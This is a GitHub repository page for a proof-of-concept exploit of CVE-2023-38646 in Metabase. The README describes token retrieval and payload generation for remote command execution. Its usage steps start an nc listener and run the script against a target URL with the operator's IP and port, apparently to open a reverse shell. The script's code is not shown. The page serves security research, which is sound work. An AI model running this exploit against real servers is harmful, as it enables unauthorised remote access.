Skip to content
/ CVE-2023-38646-PoC-Metabase Public

Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

JayRyz/CVE-2023-38646-PoC-Metabase

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
metabase_exploit.py
metabase_exploit.py
 
 

Repository files navigation

CVE-2023-38646-PoC-Metabase

Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.

Description

This is a Python-based Proof-of-Concept (PoC) script to exploit CVE-2023-38646, a vulnerability affecting Metabase. The exploit abuses misconfigurations to achieve remote command execution.

⚠️ Disclaimer:
This script is intended solely for educational purposes and ethical research. Misuse of this script to attack systems without prior consent is illegal and unethical. The author is not responsible for any damage caused by the use of this tool.

Features

  • Retrieves session tokens automatically
  • Generates payloads for remote command execution
  • Automates exploit deployment

Requirements

  • Python 3.7+
  • requests library (pip install requests)

Usage

  • Make sure to listen on port with nc first.
python3 exploit.py -u <target_url> -ip <your_ip> -p <your_port>

About

Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.

Topics

proof-of-concept cybersecurity penetration-testing poc cve web-vulnerability python-exploitation rce-exploit cve-2023-38646 metabase-vulnerability

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages